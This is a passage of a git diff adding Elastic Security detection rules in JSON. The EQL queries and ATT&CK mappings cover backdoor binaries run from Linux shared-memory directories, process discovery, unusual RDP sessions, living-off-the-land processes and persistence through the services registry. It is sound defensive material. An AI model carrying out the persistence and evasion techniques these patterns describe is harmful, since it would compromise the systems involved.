"event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "3f12325a-4cc6-410b-8d4c-9fbbeb744cfd", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1572", + "name": "Protocol Tunneling", + "reference": "https://attack.mitre.org/techniques/T1572/" + } + ] + } + ], + "type": "eql", + "version": 5 + }, + "id": "3f12325a-4cc6-410b-8d4c-9fbbeb744cfd_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_110.json b/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_110.json new file mode 100644 index 00000000000..ab13094f8fb --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3f3f9fe2-d095-11ec-95dc-f661ea17fbce_110.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of a binary by root in Linux shared memory directories: (/dev/shm/, /run/shm/, /var/run/, /var/lock/). This activity is to be considered highly abnormal and should be investigated. Threat actors have placed executables used for persistence on high-uptime servers in these directories as system backdoors.", + "false_positives": [ + "Directories /dev/shm and /run/shm are temporary file storage directories in Linux. They are intended to appear as a mounted file system, but uses virtual memory instead of a persistent storage device and thus are used for mounting file systems in legitimate purposes." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Binary Executed from Shared Memory Directory", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and\nuser.id == \"0\" and process.executable : (\"/dev/shm/*\", \"/run/shm/*\", \"/var/run/*\", \"/var/lock/*\") and\nnot process.executable : (\"/var/run/docker/*\", \"/var/run/utsns/*\", \"/var/run/s6/*\", \"/var/run/cloudera-scm-agent/*\", \n\"/var/run/argo/argoexec\") and not process.parent.command_line : \"/usr/bin/runc init\"\n", + "references": [ + "https://linuxsecurity.com/features/fileless-malware-on-linux", + "https://twitter.com/GossiTheDog/status/1522964028284411907", + "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "3f3f9fe2-d095-11ec-95dc-f661ea17fbce", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Threat: BPFDoor", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "3f3f9fe2-d095-11ec-95dc-f661ea17fbce_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3f4d7734-2151-4481-b394-09d7c6c91f75_3.json b/packages/security_detection_engine/kibana/security_rule/3f4d7734-2151-4481-b394-09d7c6c91f75_3.json new file mode 100644 index 00000000000..a9668233e62 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3f4d7734-2151-4481-b394-09d7c6c91f75_3.json @@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the use of built-in tools attackers can use to discover running processes on an endpoint.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Process Discovery via Built-In Applications", + "query": "process where event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and process.name in (\n \"ps\", \"pstree\", \"htop\", \"pgrep\"\n) and \nnot process.parent.name in (\"amazon-ssm-agent\", \"snap\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "3f4d7734-2151-4481-b394-09d7c6c91f75", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1057", + "name": "Process Discovery", + "reference": "https://attack.mitre.org/techniques/T1057/" + }, + { + "id": "T1518", + "name": "Software Discovery", + "reference": "https://attack.mitre.org/techniques/T1518/", + "subtechnique": [ + { + "id": "T1518.001", + "name": "Security Software Discovery", + "reference": "https://attack.mitre.org/techniques/T1518/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "3f4d7734-2151-4481-b394-09d7c6c91f75_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3f4e2dba-828a-452a-af35-fe29c5e78969_3.json b/packages/security_detection_engine/kibana/security_rule/3f4e2dba-828a-452a-af35-fe29c5e78969_3.json new file mode 100644 index 00000000000..694071faabd --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3f4e2dba-828a-452a-af35-fe29c5e78969_3.json @@ -0,0 +1,61 @@ +{ + "attributes": { + "anomaly_threshold": 70, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected an RDP session started at an usual time or weekday. An RDP session at an unusual time could be followed by other suspicious activities, so catching this is a good first step in detecting a larger attack.", + "from": "now-12h", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "lmd_unusual_time_weekday_rdp_session_start", + "name": "Unusual Time or Day for an RDP Session", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/lmd", + "https://www.elastic.co/blog/detecting-lateral-movement-activity-a-new-kibana-integration", + "https://www.elastic.co/blog/remote-desktop-protocol-connections-elastic-security" + ], + "related_integrations": [ + { + "package": "lmd", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "risk_score": 21, + "rule_id": "3f4e2dba-828a-452a-af35-fe29c5e78969", + "setup": "## Setup\n\nThe rule requires the Lateral Movement Detection integration assets to be installed, as well as file and Windows RDP process events collected by the Elastic Defend integration. \n\n### Lateral Movement Detection Setup\nThe Lateral Movement Detection integration detects lateral movement activity by identifying abnormalities in file and Windows RDP events. Anomalies are detected using Elastic's Anomaly Detection feature.\n\n#### Prerequisite Requirements:\n- Fleet is required for Lateral Movement Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows RDP process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n#### The following steps should be executed to install assets associated with the Lateral Movement Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Lateral Movement Detection and select the integration to see more details about it.\n- Under Settings, click Install Lateral Movement Detection assets and follow the prompts to install the assets.\n\n#### Anomaly Detection Setup\nBefore you can enable rules for Lateral Movement Detection, you'll need to enable the corresponding Anomaly Detection jobs.\n- Before enabling the Anomaly Detection jobs, confirm that the Pivot Transform asset is installed and actively gathering data in the destination index `ml-rdp-lmd`.\n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your transformed RDP process data i.e.`ml-rdp-lmd`.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/lmd/kibana/ml_module/lmd-ml.json) configuration file, you will see a card for Lateral Movement Detection under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection jobs and datafeeds.\n", + "severity": "low", + "tags": [ + "Use Case: Lateral Movement Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Lateral Movement" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1210", + "name": "Exploitation of Remote Services", + "reference": "https://attack.mitre.org/techniques/T1210/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "3f4e2dba-828a-452a-af35-fe29c5e78969_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/40155ee4-1e6a-4e4d-a63b-e8ba16980cfb_3.json b/packages/security_detection_engine/kibana/security_rule/40155ee4-1e6a-4e4d-a63b-e8ba16980cfb_3.json new file mode 100644 index 00000000000..6275b7a1af5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/40155ee4-1e6a-4e4d-a63b-e8ba16980cfb_3.json @@ -0,0 +1,66 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected a suspicious Windows process. This process has been classified as malicious in two ways. It was predicted to be malicious by the ProblemChild supervised ML model, and it was found to be suspicious given that its user context is unusual and does not commonly manifest malicious activity,by an unsupervised ML model. Such a process may be an instance of suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules.", + "from": "now-45m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "problem_child_rare_process_by_user", + "name": "Unusual Process Spawned by a User", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/problemchild", + "https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration" + ], + "related_integrations": [ + { + "package": "problemchild", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "risk_score": 21, + "rule_id": "40155ee4-1e6a-4e4d-a63b-e8ba16980cfb", + "setup": "## Setup\n\nThe rule requires the Living off the Land (LotL) Attack Detection integration assets to be installed, as well as Windows process events collected by integrations such as Elastic Defend or Winlogbeat. \n\n### LotL Attack Detection Setup\nThe LotL Attack Detection integration detects living-off-the-land activity in Windows process events.\n\n#### Prerequisite Requirements:\n- Fleet is required for LotL Attack Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration or Winlogbeat(https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To set up and run Winlogbeat, follow [this](https://www.elastic.co/guide/en/beats/winlogbeat/current/winlogbeat-installation-configuration.html) guide.\n\n#### The following steps should be executed to install assets associated with the LotL Attack Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Living off the Land Attack Detection and select the integration to see more details about it.\n- Under Settings, click Install Living off the Land Attack Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\nBefore you can enable this rule, you'll need to enrich Windows process events with predictions from the Supervised LotL Attack Detection model. This is done via the ingest pipeline named `-problem_child_ingest_pipeline` installed with the LotL Attack Detection package.\n- If using an Elastic Beat such as Winlogbeat, add the LotL ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `winlogbeat.yml`.\n- If adding the LotL ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. Edit the @custom component template corresponding to the beat/integration you added the LotL ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"problemchild\": {\n \"properties\": {\n \"prediction\": {\n \"type\": \"long\"\n },\n \"prediction_probability\": {\n \"type\": \"float\"\n }\n }\n },\n \"blocklist_label\": {\n \"type\": \"long\"\n }\n }\n}\n```\n\n### Anomaly Detection Setup\nBefore you can enable this rule, you'll need to enable the corresponding Anomaly Detection job. \n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your enriched Windows process events. For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events, or `winlogbeat-*` if you used Winlogbeat.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/problemchild/kibana/ml_module/problemchild-ml.json) configuration file, you will see a card for \"Living off the Land Attack Detection\" under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection job and datafeed.\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Living off the Land Attack Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "40155ee4-1e6a-4e4d-a63b-e8ba16980cfb_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/40155ee4-1e6a-4e4d-a63b-e8ba16980cfb_4.json b/packages/security_detection_engine/kibana/security_rule/40155ee4-1e6a-4e4d-a63b-e8ba16980cfb_4.json new file mode 100644 index 00000000000..7ac4545843c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/40155ee4-1e6a-4e4d-a63b-e8ba16980cfb_4.json @@ -0,0 +1,66 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected a suspicious Windows process. This process has been classified as malicious in two ways. It was predicted to be malicious by the ProblemChild supervised ML model, and it was found to be suspicious given that its user context is unusual and does not commonly manifest malicious activity,by an unsupervised ML model. Such a process may be an instance of suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules.", + "from": "now-45m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "problem_child_rare_process_by_user", + "name": "Unusual Process Spawned by a User", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/problemchild", + "https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration" + ], + "related_integrations": [ + { + "package": "problemchild", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "risk_score": 21, + "rule_id": "40155ee4-1e6a-4e4d-a63b-e8ba16980cfb", + "setup": "## Setup\n\nThe rule requires the Living off the Land (LotL) Attack Detection integration assets to be installed, as well as Windows process events collected by integrations such as Elastic Defend or Winlogbeat. \n\n### LotL Attack Detection Setup\nThe LotL Attack Detection integration detects living-off-the-land activity in Windows process events.\n\n#### Prerequisite Requirements:\n- Fleet is required for LotL Attack Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration or Winlogbeat(https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To set up and run Winlogbeat, follow [this](https://www.elastic.co/guide/en/beats/winlogbeat/current/winlogbeat-installation-configuration.html) guide.\n\n#### The following steps should be executed to install assets associated with the LotL Attack Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Living off the Land Attack Detection and select the integration to see more details about it.\n- Under Settings, click Install Living off the Land Attack Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\n**Before you can enable this rule**, you'll need to enrich Windows process events with predictions from the Supervised LotL Attack Detection model. This is done via the ingest pipeline named `-problem_child_ingest_pipeline` installed with the LotL Attack Detection package.\n- If using an Elastic Beat such as Winlogbeat, add the LotL ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `winlogbeat.yml`.\n- If adding the LotL ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html). For example, you can check if your winlogbeat or Elastic Defend (the [default index pattern](https://docs.elastic.co/en/integrations/endpoint#logs) being `logs-endpoint*`) already has an ingest pipeline by navigating to `Data > Index Management`, finding the index (sometimes you need to toggle \"Include hidden indices\"), and checking the index's settings for a default or final [pipeline](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#set-default-pipeline).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. Edit the @custom component template corresponding to the beat/integration you added the LotL ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"problemchild\": {\n \"properties\": {\n \"prediction\": {\n \"type\": \"long\"\n },\n \"prediction_probability\": {\n \"type\": \"float\"\n }\n }\n },\n \"blocklist_label\": {\n \"type\": \"long\"\n }\n }\n}\n```\n\n### Anomaly Detection Setup\n**Before you can enable this rule**, you'll need to enable the corresponding Anomaly Detection job. \n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your enriched Windows process events. For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events, or `winlogbeat-*` if you used Winlogbeat.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/problemchild/kibana/ml_module/problemchild-ml.json) configuration file, you will see a card for \"Living off the Land Attack Detection\" under \"Use preconfigured jobs\". Warning: if the ingest pipeline hasn't run for some reason, such as no eligible data in winlogbeat has come in yet, _you won't be able to see this card yet_. If that is the case, try troubleshooting the ingest pipeline, and if any ProblemChild predictions have been populated yet.\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection job and datafeed.\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Living off the Land Attack Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/" + } + ] + } + ], + "type": "machine_learning", + "version": 4 + }, + "id": "40155ee4-1e6a-4e4d-a63b-e8ba16980cfb_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_107.json b/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_107.json new file mode 100644 index 00000000000..852ad4d40c0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_107.json @@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies processes modifying the services registry key directly, instead of through the expected Windows APIs. This could be an indication of an adversary attempting to stealthily persist through abnormal service creation or modification of an existing service.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Persistence via Services Registry", + "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ServiceDLL\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ImagePath\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ServiceDLL\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ImagePath\"\n ) and not registry.data.strings : (\n \"?:\\\\windows\\\\system32\\\\Drivers\\\\*.sys\",\n \"\\\\SystemRoot\\\\System32\\\\drivers\\\\*.sys\",\n \"\\\\??\\\\?:\\\\Windows\\\\system32\\\\Drivers\\\\*.SYS\",\n \"system32\\\\DRIVERS\\\\USBSTOR\") and\n not (process.name : \"procexp??.exe\" and registry.data.strings : \"?:\\\\*\\\\procexp*.sys\") and\n not process.executable : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\winsxs\\\\*\\\\TiWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\drvinst.exe\",\n \"?:\\\\Windows\\\\System32\\\\services.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\regsvr32.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "403ef0d3-8259-40c9-a5b6-d48354712e49", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "403ef0d3-8259-40c9-a5b6-d48354712e49_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_108.json b/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_108.json new file mode 100644 index 00000000000..19254911078 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/403ef0d3-8259-40c9-a5b6-d48354712e49_108.json @@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies processes modifying the services registry key directly, instead of through the expected Windows APIs. This could be an indication of an adversary attempting to stealthily persist through abnormal service creation or modification of an existing service.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Persistence via Services Registry", + "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ServiceDLL\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ImagePath\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ServiceDLL\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ImagePath\"\n ) and not registry.data.strings : (\n \"?:\\\\windows\\\\system32\\\\Drivers\\\\*.sys\",\n \"\\\\SystemRoot\\\\System32\\\\drivers\\\\*.sys\",\n \"\\\\??\\\\?:\\\\Windows\\\\system32\\\\Drivers\\\\*.SYS\",\n \"system32\\\\DRIVERS\\\\USBSTOR\") and\n not (process.name : \"procexp??.exe\" and registry.data.strings : \"?:\\\\*\\\\procexp*.sys\") and\n not process.executable : (\n \"?:\\\\Program Files\\\\*.exe\",\n 